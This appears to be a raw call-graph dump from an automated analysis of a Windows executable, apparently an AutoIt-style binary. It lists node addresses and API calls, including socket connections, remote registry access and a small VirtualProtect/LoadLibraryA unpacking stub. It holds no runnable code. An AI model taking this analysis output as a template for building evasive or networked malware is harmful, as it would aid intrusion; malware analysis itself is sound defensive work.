64566->64504 64568 b2010a 48 API calls 64567->64568 64569 b07b93 64568->64569 64570 b0a6f8 48 API calls 64569->64570 64571 b07ba2 64570->64571 64574 b4be55 64573->64574 64575 b4be50 64573->64575 64574->64515 64686 b4ae06 50 API calls 2 library calls 64575->64686 64577->64529 64578->64508 64580 b2010a 48 API calls 64579->64580 64595->64552 64596->64552 64636 b74957 64635->64636 64637 b04ba1 CreateFileW 64635->64637 64638 b7495d CreateFileW 64636->64638 64639 b04bc3 64636->64639 64637->64639 64638->64639 64686->64574 64688 b0c4cd 48 API calls 64687->64688 64689 b63d89 64688->64689 64690 b0c4cd 48 API calls 64689->64690 64691 b63d91 64690->64691 64692 b0c4cd 48 API calls 64691->64692 64693 b63d99 64692->64693 64749 b07e53 48 API calls 64748->64749 64750 b478df 64749->64750 64751 b1e617 48 API calls 64750->64751 64752 b478eb 64751->64752 64753 b5267a 64752->64753 64754 b526a4 __wsetenvp 64753->64754 64755 b4f039 64754->64755 64757 b526d8 64754->64757 64759 b52763 64754->64759 64755->64121 64760 b039e8 48 API calls 2 library calls 64755->64760 64757->64755 64762 b1dfd2 60 API calls 64757->64762 64759->64755 64763 b1dfd2 60 API calls 64759->64763 64760->64121 64762->64757 64763->64759 64765 b46d8a __wsetenvp 64764->64765 64766 b46db3 GetFileAttributesW 64765->64766 64767 b46dc5 GetLastError 64766->64767 64771 b46de3 64766->64771 64768 b46de7 64767->64768 64769 b46dd0 CreateDirectoryW 64767->64769 64770 b03bcf 48 API calls 64768->64770 64768->64771 64769->64768 64769->64771 64772 b46df7 _wcsrchr 64770->64772 64771->64159 64772->64771 64773 b46d6d 48 API calls 64772->64773 64774 b46e1b 64773->64774 64774->64771 64775 b46e28 CreateDirectoryW 64774->64775 64775->64771 64777 b0a9af 64776->64777 64780 b0a9ca 64776->64780 64778 b0b8a7 48 API calls 64777->64778 64779 b0a9b7 CharUpperBuffW 64778->64779 64779->64780 64780->63838 64782 b010f9 64781->64782 64783 b74c5a 64781->64783 64784 b2010a 48 API calls 64782->64784 64785 b01100 64784->64785 64786 b01121 64785->64786 64804 b0113c 48 API calls 64785->64804 64786->63859 64788->63859 64789->63859 64790->63859 64792 b0d30a 64791->64792 64793 b0d2df 64791->64793 64792->63859 64796 b0d2e6 64793->64796 64806 b0d349 53 API calls 64793->64806 64796->64792 64805 b0d349 53 API calls 64796->64805 64797->63859 64798->63859 64799->63859 64800->63859 64801->63859 64802->63859 64803->63859 64804->64786 64805->64792 64806->64796 64807->63876 64808->63876 64809->63892 64810->63725 64811 c830e0 64812 c830f0 64811->64812 64813 c8320a LoadLibraryA 64812->64813 64816 c8324f VirtualProtect VirtualProtect 64812->64816 64814 c83221 64813->64814 64814->64812 64818 c83233 GetProcAddress 64814->64818 64817 c832b4 64816->64817 64817->64817 64818->64814 64819 c83249 ExitProcess 64818->64819 64820 b1e1b8 64821 b7bc27 64820->64821 64824 b479f8 SHGetFolderPathW 64821->64824 64825 b07e53 48 API calls 64824->64825 64826 b47a25 64825->64826 64827 b11118 64828 b1e016 50 API calls 64827->64828 64829 b1112e 64828->64829 64830 b11148 64829->64830 64831 b7abeb 64829->64831 64833 b13680 339 API calls 64830->64833 64859 b1cf79 49 API calls 64831->64859 64854 b0fad8 64833->64854 64835 b7ac2a 64838 b7ac4a Mailbox 64835->64838 64860 b4ba5d 48 API calls 64835->64860 64836 b7b628 Mailbox 64861 b4d520 86 API calls 4 library calls 64838->64861 64839 b10119 64864 b4d520 86 API calls 4 library calls 64839->64864 64842 b0fbf1 64844 b2010a 48 API calls 64844->64854 64845 b11063 64863 b4d520 86 API calls 4 library calls 64845->64863 64846 b7b772 64865 b4d520 86 API calls 4 library calls 64846->64865 64847 b0f6d0 339 API calls 64847->64854 64848 b0c935 48 API calls 64848->64854 64850 b0d3d2 48 API calls 64850->64854 64851 b7b6d2 64852 b3a599 InterlockedDecrement 64852->64854 64854->64839 64854->64842 64854->64844 64854->64845 64854->64846 64854->64847 64854->64848 64854->64850 64854->64852 64855 b21b2a 52 API calls __cinit 64854->64855 64857 b11230 64854->64857 64858 b11620 59 API calls Mailbox 64854->64858 64855->64854 64856 b7b7d2 64857->64842 64862 b4d520 86 API calls 4 library calls 64857->64862 64858->64854 64859->64835 64860->64838 64861->64836 64862->64845 64863->64851 64864->64846 64865->64856 64866 b0e85b 64869 b0d937 64866->64869 64868 b0e865 64870 b0d9a7 64869->64870 64871 b0d94f 64869->64871 64872 b0d9d0 64870->64872 64877 b4d520 86 API calls 4 library calls 64870->64877 64871->64870 64873 b0fa40 339 API calls 64871->64873 64872->64868 64875 b0d986 64873->64875 64875->64872 64876 b0d89e 50 API calls 64875->64876 64876->64870 64877->64872 64878 b0131c 64879 b0133e 64878->64879 64911 b01624 64879->64911 64884 b0d3d2 48 API calls 64885 b0137e 64884->64885 64886 b0d3d2 48 API calls 64885->64886 64887 b01388 64886->64887 64888 b0d3d2 48 API calls 64887->64888 64889 b01392 64888->64889 64890 b0d3d2 48 API calls 64889->64890 64891 b013d8 64890->64891 64892 b0d3d2 48 API calls 64891->64892 64893 b014bb 64892->64893 64919 b01673 64893->64919 64957 b017e0 64911->64957 64914 b07e53 48 API calls 64915 b01344 64914->64915 64916 b016db 64915->64916 64971 b01867 6 API calls 64916->64971 64918 b01374 64918->64884 64920 b0d3d2 48 API calls 64919->64920 64921 b01683 64920->64921 64922 b0d3d2 48 API calls 64921->64922 64923 b0168b 64922->64923 64972 b07d70 64923->64972 64926 b07d70 48 API calls 64964 b017fc 64957->64964 64960 b017fc 48 API calls 64961 b017f0 64960->64961 64962 b0d3d2 48 API calls 64961->64962 64963 b0165b 64962->64963 64963->64914 64965 b0d3d2 48 API calls 64964->64965 64966 b01807 64965->64966 64967 b0d3d2 48 API calls 64966->64967 64968 b0180f 64967->64968 64969 b0d3d2 48 API calls 64968->64969 64970 b017e8 64969->64970 64970->64960 64971->64918 64973 b0d3d2 48 API calls 64972->64973 64974 b07d79 64973->64974 64975 b0d3d2 48 API calls 64974->64975 64976 b01693 64975->64976 64976->64926 64979 b26a80 64980 b26a8c _doexit 64979->64980 65016 b28b7b GetStartupInfoW 64980->65016 64982 b26a91 65018 b2a937 GetProcessHeap 64982->65018 64984 b26ae9 64985 b26af4 64984->64985 65100 b26bd0 47 API calls 3 library calls 64984->65100 65019 b287d7 64985->65019 64988 b26afa 64989 b26b05 __RTC_Initialize 64988->64989 65101 b26bd0 47 API calls 3 library calls 64988->65101 65040 b2ba66 64989->65040 64992 b26b14 64993 b26b20 GetCommandLineW 64992->64993 65102 b26bd0 47 API calls 3 library calls 64992->65102 65059 b33c2d GetEnvironmentStringsW 64993->65059 64997 b26b1f 64997->64993 64999 b26b3a 65000 b26b45 64999->65000 65103 b21d7b 47 API calls 3 library calls 64999->65103 65069 b33a64 65000->65069 65004 b26b56 65083 b21db5 65004->65083 65017 b28b91 65016->65017 65017->64982 65018->64984 65108 b21e5a 30 API calls 2 library calls 65019->65108 65021 b287dc 65109 b28ab3 InitializeCriticalSectionAndSpinCount 65021->65109 65023 b287e1 65024 b287e5 65023->65024 65111 b28afd TlsAlloc 65023->65111 65110 b2884d 50 API calls 2 library calls 65024->65110 65027 b287ea 65027->64988 65028 b287f7 65028->65024 65029 b28802 65028->65029 65112 b27616 65029->65112 65032 b28844 65120 b2884d 50 API calls 2 library calls 65032->65120 65035 b28849 65035->64988 65036 b28823 65036->65032 65037 b28829 65036->65037 65119 b28724 47 API calls 4 library calls 65037->65119 65039 b28831 GetCurrentThreadId 65039->64988 65041 b2ba72 _doexit 65040->65041 65129 b28984 65041->65129 65043 b2ba79 65044 b27616 __calloc_crt 47 API calls 65043->65044 65045 b2ba8a 65044->65045 65046 b2baf5 GetStartupInfoW 65045->65046 65047 b2ba95 _doexit @_EH4_CallFilterFunc@8 65045->65047 65054 b2bc33 65046->65054 65056 b2bb0a 65046->65056 65047->64992 65048 b2bcf7 65136 b2bd0b RtlLeaveCriticalSection _doexit 65048->65136 65050 b2bc7c GetStdHandle 65050->65054 65051 b27616 __calloc_crt 47 API calls 65051->65056 65052 b2bc8e GetFileType 65052->65054 65053 b2bb58 65053->65054 65057 b2bb8a GetFileType 65053->65057 65058 b2bb98 InitializeCriticalSectionAndSpinCount 65053->65058 65054->65048 65054->65050 65054->65052 65055 b2bcbb InitializeCriticalSectionAndSpinCount 65054->65055 65055->65054 65056->65051 65056->65053 65056->65054 65057->65053 65057->65058 65058->65053 65060 b26b30 65059->65060 65061 b33c3e 65059->65061 65065 b3382b GetModuleFileNameW 65060->65065 65062 b27660 __malloc_crt 47 API calls 65061->65062 65063 b33c64 _memmove 65062->65063 65064 b33c7a FreeEnvironmentStringsW 65063->65064 65064->65060 65066 b3385f _wparse_cmdline 65065->65066 65067 b27660 __malloc_crt 47 API calls 65066->65067 65068 b3389f _wparse_cmdline 65066->65068 65067->65068 65068->64999 65070 b33a7d __wsetenvp 65069->65070 65074 b26b4b 65069->65074 65071 b27616 __calloc_crt 47 API calls 65070->65071 65079 b33aa6 __wsetenvp 65071->65079 65072 b33afd 65073 b228ca _free 47 API calls 65072->65073 65073->65074 65074->65004 65104 b21d7b 47 API calls 3 library calls 65074->65104 65075 b27616 __calloc_crt 47 API calls 65075->65079 65076 b33b22 65078 b228ca _free 47 API calls 65076->65078 65078->65074 65079->65072 65079->65074 65079->65075 65079->65076 65080 b33b39 65079->65080 65179 b33317 47 API calls __mbschr_l 65079->65179 65180 b27ab0 IsProcessorFeaturePresent 65080->65180 65084 b21dc1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 65083->65084 65086 b21e00 __IsNonwritableInCurrentImage 65084->65086 65203 b21b2a 52 API calls __cinit 65084->65203 65100->64985 65101->64989 65102->64997 65108->65021 65109->65023 65110->65027 65111->65028 65114 b2761d 65112->65114 65115 b2765a 65114->65115 65116 b2763b Sleep 65114->65116 65121 b33e5a 65114->65121 65115->65032 65118 b28b59 TlsSetValue 65115->65118 65117 b27652 65116->65117 65117->65114 65117->65115 65118->65036 65119->65039 65120->65035 65122 b33e65 65121->65122 65127 b33e80 __calloc_impl 65121->65127 65123 b33e71 65122->65123 65122->65127 65128 b2889e 47 API calls __getptd_noexit 65123->65128 65124 b33e90 RtlAllocateHeap 65126 b33e76 65124->65126 65124->65127 65126->65114 65127->65124 65127->65126 65128->65126 65130 b28995 65129->65130 65131 b289a8 RtlEnterCriticalSection 65129->65131 65137 b28a0c 65130->65137 65131->65043 65133 b2899b 65133->65131 65160 b21d7b 47 API calls 3 library calls 65133->65160 65136->65047 65138 b28a18 _doexit 65137->65138 65139 b28a21 65138->65139 65140 b28a39 65138->65140 65161 b28e52 47 API calls 2 library calls 65139->65161 65147 b28a59 _doexit 65140->65147 65164 b27660 65140->65164 65143 b28a26 65162 b28eb2 47 API calls 8 library calls 65143->65162 65146 b28a2d 65163 b21d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 65146->65163 65147->65133 65148 b28a63 65152 b28984 __lock 46 API calls 65148->65152 65149 b28a54 65170 b2889e 47 API calls __getptd_noexit 65149->65170 65154 b28a6a 65152->65154 65155 b28a79 InitializeCriticalSectionAndSpinCount 65154->65155 65156 b28a8e 65154->65156 65157 b28a94 65155->65157 65171 b228ca 65156->65171 65177 b28aaa RtlLeaveCriticalSection _doexit 65157->65177 65161->65143 65162->65146 65167 b2766e 65164->65167 65165 b245ec __crtLCMapStringA_stat 46 API calls 65165->65167 65166 b276a2 65166->65148 65166->65149 65167->65165 65167->65166 65168 b27681 Sleep 65167->65168 65169 b2769a 65168->65169 65169->65166 65169->65167 65170->65147 65172 b228d3 RtlFreeHeap 65171->65172 65176 b228fc __dosmaperr 65171->65176 65173 b228e8 65172->65173 65172->65176 65178 b2889e 47 API calls __getptd_noexit 65173->65178 65175 b228ee GetLastError 65175->65176 65176->65157 65177->65147 65178->65175 65179->65079 65203->65086 66047 b029c2 66048 b029cb 66047->66048 66049 b02a48 66048->66049 66050 b029e9 66048->66050 66088 b02a46 66048->66088 66052 b72307 66049->66052 66053 b02a4e 66049->66053 66054 b029f6 66050->66054 66055 b02aac PostQuitMessage 66050->66055 66051 b02a2b NtdllDefWindowProc_W 66061 b02a39 66051->66061 66102 b0322e 16 API calls 66052->66102 66056 b02a53 66053->66056 66057 b02a76 SetTimer RegisterClipboardFormatW 66053->66057 66059 b02a01 66054->66059 66060 b7238f 66054->66060 66055->66061 66062 b02a5a KillTimer 66056->66062 66063 b722aa 66056->66063 66057->66061 66065 b02a9f CreatePopupMenu 66057->66065 66066 b02ab6 66059->66066 66067 b02a09 66059->66067 66108 b457fb 60 API calls _memset 66060->66108 66099 b02b94 Shell_NotifyIconW _memset 66062->66099 66070 b722e3 MoveWindow 66063->66070 66071 b722af 66063->66071 66064 b7232e 66103 b1ec33 339 API calls Mailbox 66064->66103 66065->66061 66092 b01e58 66066->66092 66074 b72374 66067->66074 66075 b02a14 66067->66075 66070->66061 66077 b722b3 66071->66077 66078 b722d2 SetFocus 66071->66078 66074->66051 66107 b3b31f 48 API calls 66074->66107 66080 b02a1f 66075->66080 66081 b7235f 66075->66081 66076 b723a1 66076->66051 66076->66061 66077->66080 66082 b722bc 66077->66082 66078->66061 66079 b02a6d 66100 b02ac7 DeleteObject DestroyWindow Mailbox 66079->66100 66080->66051 66104 b02b94 Shell_NotifyIconW _memset 66080->66104 66106 b45fdb 70 API calls _memset 66081->66106 66101 b0322e 16 API calls 66082->66101 66087 b7236f 66087->66061 66088->66051 66090 b72353 66105 b03598 67 API calls _memset 66090->66105 66093 b01ef1 66092->66093 66094 b01e6f _memset 66092->66094 66093->66061 66109 b038e4 66094->66109 66096 b01eda KillTimer SetTimer 66096->66093 66097 b01e96 66097->66096 66098 b74518 Shell_NotifyIconW 66097->66098 66098->66096 66099->66079 66100->66061 66101->66061 66102->66064 66103->66080 66104->66090 66105->66088 66106->66087 66107->66088 66108->66076 66110 b03900 66109->66110 66130 b039d5 Mailbox 66109->66130 66111 b07b6e 48 API calls 66110->66111 66112 b0390e 66111->66112 66113 b7453f LoadStringW 66112->66113 66114 b0391b 66112->66114 66117 b74559 66113->66117 66115 b07e53 48 API calls 66114->66115 66116 b03930 66115->66116 66116->66117 66118 b03941 66116->66118 66132 b039e8 48 API calls 2 library calls 66117->66132 66121 b039da 66118->66121 66122 b0394b 66118->66122 66120 b74564 66125 b74578 66120->66125 66127 b03956 _memset _wcscpy 66120->66127 66123 b0c935 48 API calls 66121->66123 66131 b039e8 48 API calls 2 library calls 66122->66131 66123->66127 66133 b039e8 48 API calls 2 library calls 66125->66133 66129 b039ba Shell_NotifyIconW 66127->66129 66128 b74586 66129->66130 66130->66097 66131->66127 66132->66120 66133->66128 66134 b106e5 66137 b106f0 _memmove 66134->66137 66135 b2010a 48 API calls 66135->66137 66136 b0fa40 339 API calls 66136->66137 66137->66135 66137->66136 66138 b7b583 66137->66138 66140 b111a1 Mailbox 66137->66140 66142 b107d8 66137->66142 66617 b4d520 86 API calls 4 library calls 66138->66617 66618 b4d520 86 API calls 4 library calls 66140->66618 66142->66140 66143 b7a90f 66142->66143 66144 b10841 66142->66144 66159 b10903 Mailbox 66142->66159 66143->66159 66611 b3a599 InterlockedDecrement 66143->66611 66144->66138 66144->66140 66147 b108ae 66144->66147 66616 b3a599 InterlockedDecrement 66144->66616 66146 b2010a 48 API calls 66146->66159 66147->66140 66147->66159 66176 b61f19 132 API calls 66147->66176 66193 b60bfa 66147->66193 66196 b64476 66147->66196 66236 b1f03e 66147->66236 66239 b592c0 66147->66239 66257 b617aa 66147->66257 66262 b1ef0d 66147->66262 66305 b5b74b VariantInit 66147->66305 66346 b58065 GetCursorPos GetForegroundWindow 66147->66346 66360 b59122 66147->66360 66374 b610e5 66147->66374 66380 b081c6 66147->66380 66450 b5936f 66147->66450 66478 b5013f 66147->66478 66491 b050a3 66147->66491 66496 b6804e 66147->66496 66510 b630ad 66147->66510 66564 b1f461 66147->66564 66602 b6798d 66147->66602 66607 b1dd84 66147->66607 66152 b10119 66621 b4d520 86 API calls 4 library calls 66152->66621 66155 b2010a 48 API calls 66171 b0fad8 66155->66171 66156 b7b772 66622 b4d520 86 API calls 4 library calls 66156->66622 66158 b11063 66620 b4d520 86 API calls 4 library calls 66158->66620 66159->66140 66159->66146 66170 b0fbf1 Mailbox 66159->66170 66159->66171 66612 b5ee52 82 API calls 2 library calls 66159->66612 66613 b5ef9d 90 API calls Mailbox 66159->66613 66614 b4b020 48 API calls 66159->66614 66615 b5e713 339 API calls Mailbox 66159->66615 66160 b0f6d0 339 API calls 66160->66171 66161 b0c935 48 API calls 66161->66171 66163 b3a599 InterlockedDecrement 66163->66171 66164 b7b6d2 66165 b0d3d2 48 API calls 66165->66171 66167 b7b7d2 66169 b21b2a 52 API calls __cinit 66169->66171 66171->66152 66171->66155 66171->66156 66171->66158 66171->66160 66171->66161 66171->66163 66171->66165 66171->66169 66171->66170 66172 b11230 66171->66172 66610 b11620 59 API calls Mailbox 66171->66610 66172->66170 66619 b4d520 86 API calls 4 library calls 66172->66619 66176->66159 66623 b5f79f 66193->66623 66195 b60c0a 66195->66159 66197 b4be47 50 API calls 66196->66197 66198 b64495 66197->66198 66199 b644aa 66198->66199 66200 b644cb 66198->66200 66201 b0ca8e 48 API calls 66199->66201 66203 b0cdb4 48 API calls 66200->66203 66204 b644de 66200->66204 66202 b644b7 Mailbox 66201->66202 66202->66159 66203->66204 66205 b64525 66204->66205 66206 b64507 66204->66206 66208 b645dd 66205->66208 66209 b64537 66205->66209 66207 b0ca8e 48 API calls 66206->66207 66207->66202 66698 b4a65e 66208->66698 66212 b64576 66209->66212 66213 b6453b 66209->66213 66215 b2010a 48 API calls 66212->66215 66216 b07b6e 48 API calls 66213->66216 66214 b1f2d0 48 API calls 66217 b645f3 66214->66217 66218 b6457c 66215->66218 66219 b6454e 66216->66219 66220 b07b6e 48 API calls 66217->66220 66223 b07b6e 48 API calls 66218->66223 66703 b080ea 66219->66703 66222 b645fd 66220->66222 66225 b64613 66222->66225 66226 b6460c 66222->66226 66227 b645b6 66223->66227 66224 b6455b 66228 b07bef 48 API calls 66224->66228 66734 b46765 50 API calls 66225->66734 66715 b0c610 MultiByteToWideChar 66226->66715 66230 b080ea 48 API calls 66227->66230 66228->66202 66233 b645c7 66230->66233 66232 b64611 66235 b07bef 48 API calls 66232->66235 66234 b07bef 48 API calls 66233->66234 66234->66202 66235->66202 66237 b1f0b5 2 API calls 66236->66237 66238 b1f046 66237->66238 66238->66159 66240 b0a6d4 48 API calls 66239->66240 66241 b592d2 66240->66241 66242 b084a6 81 API calls 66241->66242 66243 b592e1 66242->66243 66244 b1f26b 50 API calls 66243->66244 66245 b592ed gethostbyname 66244->66245 66246 b5931d _memmove 66245->66246 66247 b592fa WSAGetLastError 66245->66247 66249 b5932d inet_ntoa 66246->66249 66248 b5930e 66247->66248 66251 b0ca8e 48 API calls 66248->66251 66736 b5adca 48 API calls 2 library calls 66249->66736 66256 b5931b Mailbox 66251->66256 66252 b59342 66737 b5ae5a 50 API calls 66252->66737 66254 b5934e 66255 b07bef 48 API calls 66254->66255 66255->66256 66256->66159 66258 b084a6 81 API calls 66257->66258 66259 b617c7 66258->66259 66260 b46f5b 63 API calls 66259->66260 66261 b617d8 66260->66261 66261->66159 66263 b0ca8e 48 API calls 66262->66263 66264 b1ef25 66263->66264 66265 b1effb 66264->66265 66266 b1ef3e 66264->66266 66268 b2010a 48 API calls 66265->66268 66761 b1f0f3 48 API calls 66266->66761 66269 b1f002 66268->66269 66270 b1f00e 66269->66270 66763 b05080 49 API calls 66269->66763 66274 b084a6 81 API calls 66270->66274 66272 b1ef4d 66273 b76942 66272->66273 66275 b1ef73 66272->66275 66276 b0cdb4 48 API calls 66272->66276 66273->66159 66277 b1f01c 66274->66277 66278 b1f03e 2 API calls 66275->66278 66279 b76965 66276->66279 66280 b04bf9 56 API calls 66277->66280 66281 b1ef7a 66278->66281 66279->66275 66282 b7696d 66279->66282 66283 b1f02b 66280->66283 66284 b1ef87 66281->66284 66285 b76980 66281->66285 66286 b0cdb4 48 API calls 66282->66286 66283->66272 66287 b76936 66283->66287 66289 b0d3d2 48 API calls 66284->66289 66288 b2010a 48 API calls 66285->66288 66286->66281 66287->66273 66764 b04592 FindCloseChangeNotification 66287->66764 66290 b76986 66288->66290 66291 b1ef8f 66289->66291 66292 b7699f 66290->66292 66765 b03d65 ReadFile SetFilePointerEx 66290->66765 66738 b1f04e 66291->66738 66299 b769a3 _memmove 66292->66299 66766 b4ad14 48 API calls _memset 66292->66766 66297 b1ef9e 66298 b07bef 48 API calls 66297->66298 66297->66299 66300 b1efb2 Mailbox 66298->66300 66301 b1eff2 66300->66301 66302 b050ec FindCloseChangeNotification 66300->66302 66301->66159 66303 b1efe4 66302->66303 66762 b04592 FindCloseChangeNotification 66303->66762 66306 b0ca8e 48 API calls 66305->66306 66307 b5b7a3 CoInitialize 66306->66307 66309 b5b7ae 66307->66309 66308 b5b7d5 66310 b5b81b 66308->66310 66312 b084a6 81 API calls 66308->66312 66309->66308 66311 b0ca8e 48 API calls 66309->66311 66313 b084a6 81 API calls 66310->66313 66311->66308 66314 b5b7ef 66312->66314 66315 b5b827 66313->66315 66790 b3a857 lstrcmpiW 66314->66790 66319 b5b861 66315->66319 66320 b5b9d3 SetErrorMode 66315->66320 66317 b5b802 66317->66310 66318 b5b807 66317->66318 66791 b5c235 339 API calls Mailbox 66318->66791 66322 b5b8a8 GetRunningObjectTable 66319->66322 66330 b5b89a 66319->66330 66333 b0cdb4 48 API calls 66319->66333 66323 b5ba15 66320->66323 66325 b5b8b8 66322->66325 66335 b5b8cb 66322->66335 66327 b5ba1f CoGetObject 66323->66327 66328 b5ba19 SetErrorMode 66323->66328 66324 b5b814 Mailbox 66329 b5bad0 VariantClear 66324->66329 66325->66335 66345 b5b8ed 66325->66345 66327->66328 66332 b5baa8 66327->66332 66343 b5b9b1 66328->66343 66329->66159 66330->66322 66796 b5c235 339 API calls Mailbox 66332->66796 66336 b5b88a 66333->66336 66792 b5c235 339 API calls Mailbox 66335->66792 66336->66330 66341 b0cdb4 48 API calls 66336->66341 66337 b5bac2 SetErrorMode 66337->66324 66338 b5ba53 66339 b5ba6f 66338->66339 66794 b3ac4b 48 API calls Mailbox 66338->66794 66795 b4a6f6 103 API calls 66339->66795 66341->66330 66343->66332 66343->66338 66345->66343 66793 b3ac4b 48 API calls Mailbox 66345->66793 66797 b56b19 66346->66797 66349 b580a5 66350 b03320 48 API calls 66349->66350 66351 b580b3 66350->66351 66802 b12320 50 API calls 66351->66802 66352 b58102 66354 b0cdb4 48 API calls 66352->66354 66359 b580f5 66352->66359 66356 b5812b 66354->66356 66355 b580cf 66803 b12320 50 API calls 66355->66803 66358 b0cdb4 48 API calls 66356->66358 66356->66359 66358->66359 66359->66159 66361 b084a6 81 API calls 66360->66361 66362 b5913f 66361->66362 66363 b0cdb4 48 API calls 66362->66363 66364 b59149 66363->66364 66804 b5acd3 66364->66804 66366 b59156 66367 b59182 66366->66367 66368 b5915a socket 66366->66368 66367->66159 66369 b59184 connect 66368->66369 66370 b5916d WSAGetLastError 66368->66370 66369->66367 66371 b591a3 WSAGetLastError 66369->66371 66370->66367 66810 b4d7e4 66371->66810 66373 b591b8 closesocket 66373->66367 66375 b084a6 81 API calls 66374->66375 66376 b610fb LoadLibraryW 66375->66376 66377 b6111e 66376->66377 66378 b6110f 66376->66378 66377->66378 66825 b628d9 48 API calls _memmove 66377->66825 66378->66159 66381 b084a6 81 API calls 66380->66381 66382 b081e5 66381->66382 66383 b084a6 81 API calls 66382->66383 66384 b081fa 66383->66384 66385 b084a6 81 API calls 66384->66385 66386 b0820d 66385->66386 66387 b084a6 81 API calls 66386->66387 66388 b08223 66387->66388 66389 b07b6e 48 API calls 66388->66389 66390 b08237 66389->66390 66391 b0cdb4 48 API calls 66390->66391 66445 b0846a 66390->66445 66392 b0825e 66391->66392 66393 b7d752 66392->66393 66419 b08281 __wopenfile 66392->66419 66392->66445 66398 b03320 48 API calls 66393->66398 66394 b7d95f 66396 b03320 48 API calls 66394->66396 66395 b7d91e 66397 b03320 48 API calls 66395->66397 66400 b7d96a 66396->66400 66401 b7d928 66397->66401 66399 b7d769 66398->66399 66427 b7d790 66399->66427 66828 b12320 50 API calls 66399->66828 66833 b12320 50 API calls 66400->66833 66403 b084a6 81 API calls 66401->66403 66407 b7d93a 66403->66407 66405 b084a6 81 API calls 66408 b08306 66405->66408 66406 b7d985 66414 b084a6 81 API calls 66406->66414 66410 b080ea 48 API calls 66407->66410 66411 b084a6 81 API calls 66408->66411 66409 b080ea 48 API calls 66409->66427 66412 b7d94e 66410->66412 66413 b0831b 66411->66413 66417 b08182 48 API calls 66412->66417 66415 b7d7ed 66413->66415 66421 b08342 66413->66421 66413->66445 66418 b7d9a0 66414->66418 66426 b03320 48 API calls 66415->66426 66415->66445 66416 b08182 48 API calls 66416->66427 66420 b7d95c 66417->66420 66422 b080ea 48 API calls 66418->66422 66419->66405 66419->66415 66440 b08364 66419->66440 66419->66445 66834 b12320 50 API calls 66420->66834 66424 b03320 48 API calls 66421->66424 66425 b7d9b4 66422->66425 66429 b0834c 66424->66429 66430 b08182 48 API calls 66425->66430 66431 b7d84a 66426->66431 66427->66409 66427->66416 66432 b0843f Mailbox 66427->66432 66829 b12320 50 API calls 66427->66829 66434 b0c4cd 48 API calls 66429->66434 66430->66420 66830 b12320 50 API calls 66431->66830 66432->66159 66433 b080ea 48 API calls 66433->66440 66434->66440 66436 b08182 48 API calls 66436->66440 66438 b7d8ce 66442 b08182 48 API calls 66438->66442 66439 b7d895 66439->66438 66441 b7d8bf 66439->66441 66440->66432 66440->66433 66440->66436 66440->66439 66826 b2247b 59 API calls 2 library calls 66440->66826 66827 b12320 50 API calls 66440->66827 66831 b0bd2f 48 API calls _memmove 66441->66831 66444 b7d8dc 66442->66444 66832 b12320 50 API calls 66444->66832 66445->66394 66445->66395 66448 b7d8ee 66449 b0c4cd 48 API calls 66448->66449 66449->66445 66451 b0cdb4 48 API calls 66450->66451 66452 b5938a 66451->66452 66453 b0cdb4 48 API calls 66452->66453 66454 b5939a 66453->66454 66455 b0ca8e 48 API calls 66454->66455 66456 b593a9 66455->66456 66457 b593c2 select 66456->66457 66477 b593ae Mailbox _memmove 66456->66477 66458 b59414 WSAGetLastError 66457->66458 66459 b5941f 66457->66459 66458->66477 66460 b2010a 48 API calls 66459->66460 66461 b59428 66460->66461 66462 b04bce 48 API calls 66461->66462 66463 b59432 __WSAFDIsSet 66462->66463 66464 b5944a 66463->66464 66463->66477 66465 b594f5 WSAGetLastError 66464->66465 66466 b59463 66464->66466 66465->66477 66467 b5947b _strlen 66466->66467 66468 b0cdb4 48 API calls 66466->66468 66466->66477 66469 b594be 66467->66469 66470 b5948e 66467->66470 66468->66467 66837 b4ad14 48 API calls _memset 66469->66837 66835 b3e0f5 48 API calls 2 library calls 66470->66835 66473 b59497 66836 b5ae5a 50 API calls 66473->66836 66475 b594a3 66476 b07bef 48 API calls 66475->66476 66476->66477 66477->66159 66479 b5015e 66478->66479 66481 b50157 66478->66481 66480 b084a6 81 API calls 66479->66480 66480->66481 66482 b084a6 81 API calls 66481->66482 66483 b5017c 66482->66483 66838 b476db GetFileVersionInfoSizeW 66483->66838 66485 b5018d 66486 b50192 66485->66486 66488 b501a3 _wcscmp 66485->66488 66487 b0ca8e 48 API calls 66486->66487 66490 b501a1 66487->66490 66489 b0ca8e 48 API calls 66488->66489 66489->66490 66490->66159 66492 b2010a 48 API calls 66491->66492 66493 b050b3 66492->66493 66494 b050ec FindCloseChangeNotification 66493->66494 66495 b050be 66494->66495 66495->66159 66854 b019ee 66496->66854 66501 b68091 66503 b0d3d2 48 API calls 66501->66503 66502 b6806f 66504 b0ca8e 48 API calls 66502->66504 66505 b6809a 66503->66505 66509 b6808f Mailbox 66504->66509 66880 b3e2e8 66505->66880 66507 b680aa 66508 b07bef 48 API calls 66507->66508 66508->66509 66509->66159 66511 b0ca8e 48 API calls 66510->66511 66512 b630ca 66511->66512 66513 b0d3d2 48 API calls 66512->66513 66514 b630d3 66513->66514 66515 b0d3d2 48 API calls 66514->66515 66516 b630dc 66515->66516 66517 b0d3d2 48 API calls 66516->66517 66518 b630e5 66517->66518 66519 b084a6 81 API calls 66518->66519 66520 b630f4 66519->66520 66521 b63d7b 48 API calls 66520->66521 66522 b63128 66521->66522 66523 b63af7 49 API calls 66522->66523 66524 b63159 66523->66524 66525 b6319c RegOpenKeyExW 66524->66525 66526 b63172 RegConnectRegistryW 66524->66526 66534 b6315d Mailbox 66524->66534 66528 b631f7 66525->66528 66529 b631c5 66525->66529 66526->66525 66526->66534 66530 b084a6 81 API calls 66528->66530 66532 b631d9 RegCloseKey 66529->66532 66529->66534 66531 b63207 RegQueryValueExW 66530->66531 66533 b6323e 66531->66533 66558 b63229 66531->66558 66532->66534 66535 b63265 66533->66535 66536 b6344c 66533->66536 66533->66558 66534->66159 66537 b6326e 66535->66537 66538 b633d9 66535->66538 66539 b2010a 48 API calls 66536->66539 66541 b6338d 66537->66541 66542 b63279 66537->66542 66997 b4ad14 48 API calls _memset 66538->66997 66543 b63464 66539->66543 66540 b634eb RegCloseKey 66540->66534 66544 b634fe RegCloseKey 66540->66544 66549 b084a6 81 API calls 66541->66549 66547 b632de 66542->66547 66548 b6327e 66542->66548 66550 b084a6 81 API calls 66543->66550 66544->66534 66546 b633e4 66551 b084a6 81 API calls 66546->66551 66553 b2010a 48 API calls 66547->66553 66556 b084a6 81 API calls 66548->66556 66548->66558 66552 b633a1 RegQueryValueExW 66549->66552 66554 b63479 RegQueryValueExW 66550->66554 66555 b633f6 